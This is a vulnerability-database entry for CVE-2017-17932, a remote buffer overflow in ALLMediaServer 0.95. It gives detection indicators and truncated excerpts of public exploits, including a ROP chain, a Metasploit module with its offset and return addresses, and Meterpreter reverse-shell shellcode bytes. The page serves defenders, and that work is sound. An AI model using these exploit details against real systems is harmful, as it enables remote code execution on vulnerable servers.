CVE-2017-17932
published 2017-12-28CVE-2017-17932: A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary…
PriorityP270critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
53.32%
98.9th percentile
A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 888.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| allmediaserver | allmediaserver | <= 0.95 | — |
| allmediaserver | allmediaserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xff\xff\xff\xff (NSEH record) followed by stack pivot at 0x0042b356
bytes↗
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (meterpreter reverse_tcp shellcode)
- →Detect exploitation attempts by monitoring for abnormally long TCP payloads (≥3000 bytes) sent to TCP port 888, targeting the ALLMediaServer MediaServer.exe process. ↗
- →The SEH-based exploit uses a fixed stack-pivot return address (0x0042b356: ADD ESP,800 # POP EBX # RETN) in MediaServer.exe; presence of this address in network traffic to port 888 is a strong exploit indicator. ↗
- →The SEH overwrite offset is 1072 bytes; network payloads to port 888 with exactly this structure (padding + SEH record at offset 1072) indicate active exploitation. ↗
- →The Metasploit module uses RET address 0x00408315 (POP # POP # POP # RET from MediaServer.exe) as the SEH handler overwrite value; scan for this value in payloads to port 888. ↗
- →Monitor for new outbound TCP connections from MediaServer.exe to unexpected hosts/ports (e.g., port 4444) following inbound connections on port 888, indicating successful meterpreter reverse_tcp shell establishment. ↗
- →The vulnerability is triggered via a boundary error in HTTP request handling within MediaServer.exe; inspect HTTP traffic on port 888 for oversized request strings. ↗
- ·The ROP chain and stack-pivot reliability differ between virtual (VMware, VirtualBox) and physical environments on Windows 7; DEP bypass via ROP is not used in the Metasploit module's Windows 7 SP1 target because AllMediaServer won't run with DEP by default (OptIn). ↗
- ·The CVE affects ALLMediaServer 0.95 and earlier; a related issue (CVE-2022-28381) affects ALLMediaServer 1.6 via the same TCP port 888 attack vector, so detection rules should not be version-gated. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2r7f-pxmp-h43x: A buffer overflow vulnerability exists in MediaServer
ghsa_unreviewed·2022-05-14
CVE-2017-17932 [CRITICAL] CWE-119 GHSA-2r7f-pxmp-h43x: A buffer overflow vulnerability exists in MediaServer
A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 888.
GHSA
GHSA-3984-jq7g-h99p: Mediaserver
ghsa_unreviewed·2022-04-04·CVSS 9.8
CVE-2022-28381 [CRITICAL] CWE-787 GHSA-3984-jq7g-h99p: Mediaserver
Mediaserver.exe in ALLMediaServer 1.6 has a stack-based buffer overflow that allows remote attackers to execute arbitrary code via a long string to TCP port 888, a related issue to CVE-2017-17932.
No detection rules found.
Exploit-DB
ALLMediaServer 0.95 - Remote Buffer Overflow
exploitdb·2018-01-11·CVSS 9.8
CVE-2017-17932 [CRITICAL] ALLMediaServer 0.95 - Remote Buffer Overflow
ALLMediaServer 0.95 - Remote Buffer Overflow
---
#!/usr/bin/python
# Exploit Title: Stack Buffer Overflow in ALLMediaServer 0.95
# Exploit Author: Mario Kartone Ciccarelli
# Contact: https://twitter.com/Kartone
# CVE: CVE-2017-17932
# Date: 09-01-2018
# Thanks to PoC: https://www.exploit-db.com/exploits/43406/
# Software link: http://www.allmediaserver.org/download
# Version: 0.95
# Attack: Remote Code Execution
# Tested on: Windows 7 x64 Ultimate Eng SP1
#
import sys
import socket
import struct
def main():
def create_rop_chain():
rop_gadgets = [
0x00407f5d, # POP EAX # RETN [MediaServer.exe]
0x00797250, # ptr to &VirtualAlloc() [IAT MediaServer.exe]
0x004061db, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MediaServer.exe]
0x0053bc02, # XCHG EAX,ESI # RETN [MediaServer.exe]
0x006c71f8, # POP
Exploit-DB
ALLMediaServer 0.95 - Remote Buffer Overflow (Metasploit)
exploitdb·2017-12-28
CVE-2017-17932 ALLMediaServer 0.95 - Remote Buffer Overflow (Metasploit)
ALLMediaServer 0.95 - Remote Buffer Overflow (Metasploit)
---
require 'msf/core'
class Metasploit4 'ALLMediaServer 0.95 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in ALLMediaServer 0.95.
The vulnerability is caused due to a boundary error within the
handling of HTTP request.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Anurag Srivastava', # Remote exploit and Metasploit module
],
'References' =>
[
[ 'EDB', '43406' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process', #none/process/thread/seh
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "",
'Space' => 660,
'DisableNops' => true
},
'Targets' =>
[
[ 'ALLMediaServer 0.95 / Windows XP SP3 - English',
{
'Ret' => 0x00408315, # POP # POP # POP # RET
'Offset' => 1072
}
],
[ 'ALLMediaServer 0.95
Exploit-DB
ALLMediaServer 0.95 - Buffer Overflow (PoC)
exploitdb·2017-12-27·CVSS 9.8
CVE-2017-17932 [CRITICAL] ALLMediaServer 0.95 - Buffer Overflow (PoC)
ALLMediaServer 0.95 - Buffer Overflow (PoC)
---
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service
#1. Description
#
#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
#
#
#2. Proof of Concept
#
#
Metasploit
ALLMediaServer 0.8 Buffer Overflow
metasploit
ALLMediaServer 0.8 Buffer Overflow
ALLMediaServer 0.8 Buffer Overflow
This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't reliable across virtual (VMWare, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP.
No writeups or analysis indexed.
2017-12-28
Published